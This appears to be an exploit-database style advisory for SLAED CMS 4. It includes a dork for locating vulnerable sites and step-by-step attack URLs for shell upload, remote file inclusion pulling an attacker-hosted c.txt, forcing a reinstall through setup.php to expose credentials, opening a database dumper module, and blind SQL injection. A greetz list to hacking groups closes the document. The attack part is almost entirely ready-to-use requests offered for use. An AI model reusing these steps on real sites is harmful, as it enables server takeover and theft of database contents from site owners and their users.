========================================================================================
| # Title : Script Slaed Cms 4 Mullti Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.sec-war.com
| # Web Site :
| # Dork : Powered by SLAED CMS © 2005-2008 SLAED. All rights reserved.
Licensed to w-arab.com © 2010 Creative Studio. All rights reserved.
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Mullti
====================== Exploit By indoushka =================================
# Exploit :
1 - Upload Shell:
first Register in to web site http://127.0.0.1/sd/index.php?name=files&op=add (use temper data)
secend go to http://127.0.0.1/sd/uploads/files/temp/ 2 find you Ev!l
2 - RFI:
http://localhost/sd/index.php?file=http://localhost/c.txt?
http://localhost/sd/index.php?name=http://localhost/c.txt?
3 - Reinstall Script :
http://127.0.0.1/sd/setup.php?op=language&lang=1
or
http://127.0.0.1/sd/install/index.php?op=language&lang=1
4 - Data Base Dumper :
First go to http://127.0.0.1/sd/admin.php?op=files&panel=1
put This code javascript:OpenWindow('modules/Dumper/index.php',%20'Dumper',%20'400',%20'350')
you know the user and pass from Reinstall script information to login to databass
5 - Blind SQL/XPath injection (I hate SQl *_*) :
http://127.0.0.1/sd/index.php?id=1
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ==========================================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * www.no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net
www.alkrsan.net * www.kadmiwe.net * www.arhack.net * D4NB4R http://www.ilegalintrusion.net/foro/
--------------------------------------------------------------------------------------------------------------